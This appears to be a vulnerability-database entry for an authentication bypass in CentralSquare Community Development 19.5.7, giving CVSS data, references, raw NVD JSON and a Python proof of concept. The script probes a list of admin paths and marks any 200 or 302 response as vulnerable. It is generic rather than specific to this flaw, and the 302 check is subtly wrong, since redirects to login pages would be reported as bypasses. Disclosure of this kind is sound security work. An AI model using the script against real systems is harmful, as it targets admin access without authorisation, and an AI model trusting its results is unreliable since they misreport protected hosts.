CVE-2025-64281

Description

An Authentication Bypass issue in CentralSquare Community Development 19.5.7 allows attackers to access the admin panel without admin credentials.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:centralsquare:community_development:19.5.7:*:*:*:*:*:*:* - VULNERABLE

CentralSquare Community Development 19.5.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-64281 Authentication Bypass PoC
# Target: CentralSquare Community Development
# Type: Authentication Bypass

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else "http://target:8080"

# Try to access admin panel without authentication
admin_paths = [
    "/admin",
    "/admin/home",
    "/admin/dashboard",
    "/admin/settings",
    "/api/admin/users",
    "/api/admin/config"
]

print(f"[*] Testing CVE-2025-64281 on {target}")
print("[*] Attempting to bypass authentication...\n")

for path in admin_paths:
    url = target + path
    try:
        response = requests.get(url, timeout=10, allow_redirects=False)
        if response.status_code in [200, 302]:
            print(f"[+] VULNERABLE: {url}")
            print(f"    Status: {response.status_code}")
            if 'location' in response.headers:
                print(f"    Redirect: {response.headers['location']}")
        else:
            print(f"[-] Not vulnerable: {url} (Status: {response.status_code})")
    except Exception as e:
        print(f"[!] Error testing {url}: {e}")

print("\n[*] PoC execution completed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64281
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64281
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64281/
[4] VulDB https://vuldb.com/cve/CVE-2025-64281
[5] https://centralsquare.com
[6] https://machevalia.blog/blog/multiple-vulnerabilities-in-centralsquare-etrakit-and-ivr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64281", "sourceIdentifier": "[email protected]", "published": "2025-11-12T16:15:37.090", "lastModified": "2025-12-31T16:42:59.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Authentication Bypass issue in CentralSquare Community Development 19.5.7 allows attackers to access the admin panel without admin credentials."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:centralsquare:community_development:19.5.7:*:*:*:*:*:*:*", "matchCriteriaId": "B643ABCA-E7F8-4635-B215-023FF1FBBCAA"}]}]}], "references": [{"url": "https://centralsquare.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://machevalia.blog/blog/multiple-vulnerabilities-in-centralsquare-etrakit-and-ivr", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}